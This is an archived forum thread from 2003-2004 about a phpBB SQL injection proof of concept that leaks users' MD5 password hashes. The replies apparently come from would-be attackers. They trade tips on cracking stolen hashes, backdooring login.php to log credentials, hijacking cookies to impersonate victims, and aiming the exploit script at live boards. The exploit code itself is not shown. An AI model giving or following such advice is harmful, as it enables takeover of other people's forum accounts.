This exploit is getting a mixed reaction. Rootsecure.net find the code "ingenious" while some sources claim the exploit has to many pre-requisites. You decide.
A recent post to the BugTraq mailing list reveled yet another vulnerability found in phpBB "a high powered, fully scalable, and highly customisable open-source bulletin board package".
The post contains ingenious proof of concept code, to circumvent phpBB's inbuilt security measures, specifically the fact that with this vulnerability, only integers can be passed back to the client. In this case the MD5 password hash of a specific user is passed back one character at a time.
The attack was found to be successful when carried out against a test machine setup running "mysql Ver 12.20 Distrib 4.0.13" however only when PHP was configured with the 'register_globals' variable set to on - a common configuration on most web servers, which will hopefully be eradiated with the increased implementation of PHP 4 (defaults to setting register_globlals = off).
For the test scenario a user was registered on the phpBB board with username 'test', and password 'test123'. The MD5 hash of 'test123' (cc03e747a6afbbcbf8be7668acfebee5) was gained by executing the following Perl code: use Digest::MD5 qw(md5_hex); $digest = md5_hex("test123"); print "$digest\n";
which issued the response : Trying to get password hash for uid 3 server localhost dbtype: mysql4 MD5 Hash for uid 3 is cc03e747a6afbbcbf8be7668acfebee5
Note: The MD5 hash gained from the exploit can be see to match that of the known hash for the password 'test123'.
Once gained by the attacker, the MD5 password hash can be used in two main ways. An attempt can be made to brute force it (a 7 character password on a reasonable spec' machine would take a couple of hours) or it can be inserted into a custom made HTTP get request - both methods lead to successful compromise of a phpBB user account.
Actual log entries gained from a successful attack, along with the raw HTML traffic sent back by the client, are available for download from: content/temp/phpbb_sql_int_inqection.txt
KarachiKing555
Oct 27 2003, 10:11 PM
hi, how r u guyz using .sql.pl as exploit ! little hints pls , iam new to all this so dont flame me off !thanx
dorsi
Oct 11 2003, 10:04 PM
Please some1 answer me... its very important
dorsi
Oct 11 2003, 06:37 PM
Hi, i did like the exploit said and its show me only: MD5 Hash for uid 3 is without the MD5 hash password... if you know whats the problem here please help me
greetz, dor
Cetras
Oct 16 2003, 10:03 PM
And how i can crack the hash of 32 caracters ? I try whith mdcrack but he said he can't crack it
And how i make the .txt file ? with only the hash or "user:hash" ???
Thx (sry for my bad english ^^)
ps : I think if you've nothing it's that the exploit didn't work on this version (phpbb 2.0.6 or mysql)
Cetras
Oct 17 2003, 08:43 PM
okay, i hack them with Cain and the exploit work with 2.0.6 too
agathos
Oct 17 2003, 09:14 PM
i got the same error : Trying to get password hash for uid 1 server xxxxxxx dbtype: mysql4
MD5 Hash for uid 1 is
and then they exit
Cetras
Oct 18 2003, 01:47 PM
Somebody knows how to find the ip of a board ? Because somes are hosted and you can't use the exploit if you don't know the ip adress.
Kynroxes
Oct 21 2003, 05:00 AM
lol Cetras, rulezz phpbb sploit !! but if you won't use the mdcrack, you can create a code in the login.php in order to write the login/password in a .txt file... But this technic need the right in login.php, so!
tnx for that perl code for converting normal string to MD5 hash! but who know the code to reconvert it?!
Faceless Master
Feb 8 2004, 03:16 PM
Didnt work for me... ~Regards Faceless Master
P.s. Karachi King use ActivePerl
DvilleStoner
Feb 26 2004, 10:34 AM
QUOTE (KarachiKing555 @ Oct 27 2003, 10:11 PM)
hi, how r u guyz using .sql.pl as exploit ! little hints pls , iam new to all this so dont flame me off !thanx
same question
z0mbi3
Feb 26 2004, 11:26 AM
to run it Install Activestate Perl Then thru command prompt Type perl hello.pl Should run...
I don't think you can convert md5 to a normal string.. U'll need to convert the normal string into md5 and see if it matches. .more in the lines of brute forcing
migo
Feb 26 2004, 11:52 AM
hello tring to use it but it gives me the same result which an empty md5 hash
as u know mostly i can't put the ip addresses because most of ip's are shared and most site are virtually hosted any clue on how to modify the code i tried to put the query directly within the browser but it did't work
any clue is much appreciated
Best Regards migo
canardwc
Mar 6 2004, 06:53 PM
Hum seems to work thx :-)
setthesun
Mar 6 2004, 10:42 PM
Also if PHPBB use cookies (and we know it uses), you don't have to crack MD5 passwords, just modify cookies and steal your victim identity
Hint : Use a proxy to modify HTTP Headers (something like spike proxy)
p3nGu1n
Jun 10 2004, 04:01 AM
perl phpbb_sql.pl xx.xx.xx.xx http://domain.co.uk/forum/viewtopic.php 3 Trying to get password hash for uid 3 server xx.xx.xx.xx dbtype: mysql4 Couldnt connect to xx.xx.xx.xx:80 : IO::Socket::INET: Bad protocol 'tcp'
usping active perl.
jadedchron
Jul 11 2004, 12:13 AM
Did anyone ever resolve a way to do this even if it's not a hergerburger or w/e the thing was (lol)?
Or is it COMPLETELY impossible to do if the forum is something to the effect of
www.blah.com/phpbb2/
but it's really www.somehost.com/blah/phpbb2 or something of that nature?
chris105
Jul 11 2004, 12:16 PM
Shouldnt have thought so, the status bar at the bottom will show the URL where you have been redirected, right?
it takes me to their hosts page or something similar.
linuxwolf
Jul 11 2004, 09:59 PM
Aight, ill be the first one to answer the original question. Let me put it simply, I N G E N I O U S C O D E Heh, think that gets the point across, anyway, you lot need to read up some shit. I understand asking for help but all the time is unacceptable. Learn to help yourselves.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
